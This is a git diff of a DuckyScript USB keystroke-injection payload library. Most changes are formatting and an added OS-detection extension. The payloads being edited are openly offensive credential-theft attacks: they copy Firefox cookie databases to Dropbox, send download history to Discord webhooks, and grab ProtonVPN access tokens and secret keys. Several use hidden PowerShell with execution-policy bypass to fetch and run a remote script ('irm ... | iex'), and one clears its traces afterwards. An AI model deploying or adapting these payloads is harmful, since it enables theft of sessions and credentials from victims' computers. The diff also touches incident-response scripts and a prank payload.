+REM_BLOCK
+####################################################
+# #
+# Title : Export Firefox Cookies Database #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+####################################################
+END_REM
REM Requirements:
REM - Firefox must be installed
-
REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
-DEFINE DROPBOX_ACCESS_TOKEN "example"
+DEFINE #DROPBOX_ACCESS_TOKEN "example"
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-DELAY 500
-ENTER
+STRINGLN powershell
DELAY 2000
-
REM Get cookies DB path
STRINGLN
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
@@ -33,14 +71,8 @@ STRINGLN
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
-END_STRINGLN
+ $accessToken = #DROPBOX_ACCESS_TOKEN
-REM Setting about exfiltration
-STRING $accessToken =
-STRING DROPBOX_ACCESS_TOKEN
-ENTER
-
-STRINGLN
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
$dropboxFilePath = "/cookies_exported.sqlite"
diff --git a/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt b/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
index 0f88392..62b6d05 100644
--- a/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
+++ b/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
@@ -1,26 +1,68 @@
-REM ####################################################################
-REM # |
-REM # Title : Export all saved certificates with Adobe Reader |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ####################################################################
-
+REM_BLOCK
+####################################################################
+# #
+# Title : Export all saved certificates with Adobe Reader #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+####################################################################
+END_REM
REM Requirements:
REM - Adobe Reader must be installed
REM - Internet Connection
-
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE #DROPBOX_ACCESS_TOKEN example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
GUI r
DELAY 1000
-STRING PowerShell
+STRINGLN PowerShell
DELAY 2000
REM Settings about Adobe Reader
diff --git a/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt b/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt
index c8a8bcd..517cd70 100644
--- a/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt
+++ b/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt
@@ -1,20 +1,63 @@
-REM ###########################################################
-REM # |
-REM # Title : Exports all the links of the downloads |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10/11 |
-REM # |
-REM ###########################################################
-
+REM_BLOCK
+###########################################################
+# #
+# Title : Exports all the links of the downloads #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10/11 #
+# #
+###########################################################
+END_REM
REM Requirements:
REM - Firefox installed
-
REM You must define your Discord webhook if you want to use this method for the exfiltration
-DEFINE DISCORD_WEBHOOK example
+DEFINE #DISCORD_WEBHOOK example
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Firefox
GUI
@@ -49,9 +92,7 @@ DELAY 10000
STRINGLN "
REM Exfiltration using Discord Webhook
-STRING $WebhookUrl = "
-STRING DISCORD_WEBHOOK
-STRINGLN "
+STRINGLN $WebhookUrl = "#DISCORD_WEBHOOK"
STRINGLN $Payload = @{content = $DOWNLOADS} | ConvertTo-Json
diff --git a/payloads/library/exfiltration/ProtonVPN-config/payload.txt b/payloads/library/exfiltration/ProtonVPN-config/payload.txt
index 796d694..aa1f6d9 100644
--- a/payloads/library/exfiltration/ProtonVPN-config/payload.txt
+++ b/payloads/library/exfiltration/ProtonVPN-config/payload.txt
@@ -1,43 +1,83 @@
-REM ###################################################################
-REM # |
-REM # Title : ProtonVPN-config-to-Discord-Exfiltration |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Credentials, Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###################################################################
+REM_BLOCK
+###################################################################
+# #
+# Title : ProtonVPN-config-to-Discord-Exfiltration #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Credentials, Exfiltration #
+# Target : Windows 10-11 #
+# #
+###################################################################
-REM Title: ProtonVPN-config-to-Discord-Exfiltration
-REM Author: Aleff
-REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
-REM In the config file you can find a lot information about the user like:
-REM - UserUid
-REM - UserAccessToken
-REM - UserRefreshToken
-REM - UserAuthenticationPublicKey
-REM - UserAuthenticationSecretKey
-REM - UserAuthenticationCertificatePem
-REM - UserCertificationServerPublicKey
-REM - and so on...
-REM Then it cleans up traces of what you have done after.
-REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
-REM Version: 1.0
-REM Category: Credentials, Exfiltration
-REM Requirements: ProtonVPN user logged at least one time and internet connection
-REM
+Title: ProtonVPN-config-to-Discord-Exfiltration
+Author: Aleff
+Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
+ In the config file you can find a lot information about the user like:
+ - UserUid
+ - UserAccessToken
+ - UserRefreshToken
+ - UserAuthenticationPublicKey
+ - UserAuthenticationSecretKey
+ - UserAuthenticationCertificatePem
+ - UserCertificationServerPublicKey
+ - and so on...
+ Then it cleans up traces of what you have done after.
+Target: Windows 10-11 (PowerShell + ProtonVPN software)
+Version: 1.0
+Category: Credentials, Exfiltration
+Requirements: ProtonVPN user logged at least one time and internet connection
+END_REM
+
+REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
+DEFINE #PAYLOAD example.com
REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks//
-DEFINE WEBHOOK example.com
+DEFINE #WEBHOOK example.com
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 2000
GUI r
DELAY 250
DELETE
-STRING powershell -w h -ep bypass $discord='
-STRING WEBHOOK
-
-REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
-DEFINE PAYLOAD example.com
-STRING ';irm PAYLOAD | iex
-ENTER
+STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';irm #PAYLOAD | iex
diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
index 955e368..5a813a2 100644
--- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
+++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
@@ -41,18 +41,12 @@ I used the [DETECT_READY](https://shop.hak5.org/blogs/usb-rubber-ducky/detect-re
Github
-
-
-
-
- Instagram
- |
- Discord
+ Linkedin
|
-
+
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
index 452d120..0f67474 100644
--- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
+++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
@@ -1,12 +1,14 @@
-REM ###########################################################
-REM # |
-REM # Title : Tree Structure Of The Operating System |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###########################################################
+REM_BLOCK
+###########################################################
+# #
+# Title : Tree Structure Of The Operating System #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+###########################################################
+END_REM
REM Requirements:
REM - Internet connection
diff --git a/payloads/library/exfiltration/Windows-netstat/payload.txt b/payloads/library/exfiltration/Windows-netstat/payload.txt
index 8728395..c2133e3 100644
--- a/payloads/library/exfiltration/Windows-netstat/payload.txt
+++ b/payloads/library/exfiltration/Windows-netstat/payload.txt
@@ -1,45 +1,84 @@
-REM ###################################################################
-REM # |
-REM # Title : Windows-netstat-to-Discord-Exfiltration |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Net, Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###################################################################
+REM_BLOCK
+###################################################################
+# #
+# Title : Windows-netstat-to-Discord-Exfiltration #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Net, Exfiltration #
+# Target : Windows 10-11 #
+# #
+###################################################################
-REM Title: Windows-netstat-to-Discord-Exfiltration
-REM Author: Aleff
-REM Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
-REM Put 1 on the function that you want to active, else 0. Functions available:
-REM - default (simple 'netstat' command)
-REM - routing_table $r
-REM - listening_canonical $lc
-REM - listening_numerical $ln
-REM - all_canonical $ac
-REM - all_numerical $an
-REM - offload ot
-REM - proto $p ""
-REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
+Title: Windows-netstat-to-Discord-Exfiltration
+Author: Aleff
+Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
+Put 1 on the function that you want to active, else 0. Functions available:
+- default (simple 'netstat' command)
+- routing_table $r
+- listening_canonical $lc
+- listening_numerical $ln
+- all_canonical $ac
+- all_numerical $an
+- offload ot
+- proto $p ""
+- - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
-REM Target: Windows 10-11 (PowerShell)
-REM Version: 1.0
-REM Category: Net, Exfiltration
-REM Requirements: Internet connection
-REM
+Target: Windows 10-11 (PowerShell)
+Version: 1.0
+Category: Net, Exfiltration
+Requirements: Internet connection
+END_REM
REM REQUIRED - Provide your Discord WEBHOOK
-DEFINE WEBHOOK https://discordapp.com/api/webhooks//
+DEFINE #WEBHOOK https://discordapp.com/api/webhooks//
+
+REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
+DEFINE #PAYLOAD example.com
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 2000
GUI r
DELAY 250
DELETE
-STRING powershell -w h -ep bypass $discord='
-
-STRING WEBHOOK
-
-REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
-DEFINE PAYLOAD example.com
-STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex
-ENTER
+STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm #PAYLOAD | iex
diff --git a/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt b/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt
index 2f38763..e86dc01 100644
--- a/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt
+++ b/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt
@@ -1,13 +1,14 @@
-REM #############################################################################################
-REM # #
-REM # Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : incident-response #
-REM # Target : Cisco IOS XE #
-REM # #
-REM #############################################################################################
-
+REM_BLOCK
+#############################################################################################
+# #
+# Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : incident-response #
+# Target : Cisco IOS XE #
+# #
+#############################################################################################
+END_REM
REM Set the script name, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.
DEFINE #SCRIPT-NAME auto-check.sh
@@ -75,17 +76,17 @@ STRINGLN
done' > #PATH-TO-SCRIPT#SCRIPT-NAME
END_STRINGLN
-
-
REM To avoid some bad DELAY I decided to use only one command row
-REM Old script
-REM STRINGLN sudo chmod +x #SCRIPT-NAME
-REM DELAY 500
-REM STRINGLN #SUDO-PSWD
-REM DELAY 3000
-REM STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
-REM STRINGLN exit
+REM_BLOCK
+Old script:
+ STRINGLN sudo chmod +x #SCRIPT-NAME
+ DELAY 500
+ STRINGLN #SUDO-PSWD
+ DELAY 3000
+ STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
+ STRINGLN exit
+END_REM
REM Optimized script
STRINGLN sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit
diff --git a/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt b/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt
index 9bb09a8..0cb57d1 100644
--- a/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt
+++ b/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt
@@ -1,34 +1,79 @@
-REM #######################################################################################################################
-REM # |
-REM # Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Incident Response |
-REM # Target : Windows 10/11 |
-REM # |
-REM #######################################################################################################################
+REM_BLOCK
+#######################################################################################################################
+# #
+# Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Incident Response #
+# Target : Windows 10/11 #
+# #
+#######################################################################################################################
-REM PlugAndPlay <3
+PlugAndPlay <3
-REM Requirements:
-REM - ExecutionPolicy Bypass
+Requirements:
+ - ExecutionPolicy Bypass
-REM Impact: Remote Code Execution
-REM Max Severity: Important
+Impact: Remote Code Execution
+Max Severity: Important
-REM Mitigation:
+Mitigation:
-REM - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
+ - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
-REM - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
+ - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
-REM The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
+The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
-REM It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
+It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
-REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
+Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
+END_REM
+
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI x
DELAY 500
STRING a
diff --git a/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt b/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt
index 8e9ae56..7c6ec5a 100644
--- a/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt
+++ b/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt
@@ -1,25 +1,27 @@
-REM ########################################################
-REM # |
-REM # Title : Defend Yourself From CVE-2023-23397 |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Incident-Response |
-REM # Target : Windows 10/11 |
-REM # |
-REM ########################################################
+REM_BLOCK
+########################################################
+# #
+# Title : Defend Yourself From CVE-2023-23397 #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Incident-Response #
+# Target : Windows 10/11 #
+# #
+########################################################
-REM PlugAndPlay <3
+PlugAndPlay <3
-REM Requirements:
-REM - ExecutionPolicy Bypass
-REM - PayloadStudio 1.3.1
+Requirements:
+ - ExecutionPolicy Bypass
+ - PayloadStudio 1.3.1
-REM Impacted Products:
-REM - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
+Impacted Products:
+ - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
-REM Mitigation:
-REM - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
-REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
+Mitigation:
+ - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
+ Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
+END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
index 8b2495e..5642176 100644
--- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
+++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
@@ -1,12 +1,14 @@
-REM ################################################################################
-REM # #
-REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : incident-response #
-REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
-REM # #
-REM ################################################################################
+REM_BLOCK
+################################################################################
+# #
+# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : incident-response #
+# Target : Citrix NetScaler ADV; NetScaler Gateway #
+# #
+################################################################################
+END_REM
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
DEFINE #HOSTNAME example
diff --git a/payloads/library/prank/Alien Message From Computer/payload.txt b/payloads/library/prank/Alien Message From Computer/payload.txt
index ec205f0..5713691 100644
--- a/payloads/library/prank/Alien Message From Computer/payload.txt
+++ b/payloads/library/prank/Alien Message From Computer/payload.txt
@@ -1,39 +1,79 @@
+REM_BLOCK
+####################################################
+# #
+# Title : Alien Message From Computer #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10/11 #
+# #
+####################################################
-REM ####################################################
-REM # |
-REM # Title : Alien Message From Computer |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10/11 |
-REM # |
-REM ####################################################
+Plug-And-Play <3
+Requirements:
+ - Internet Connection
+ - ExecutionPolicy Bypass
+ - Python
+END_REM
-REM Plug-And-Play <3
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
-REM Requirements:
-REM - Internet Connection
-REM - ExecutionPolicy Bypass
-REM - Python
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
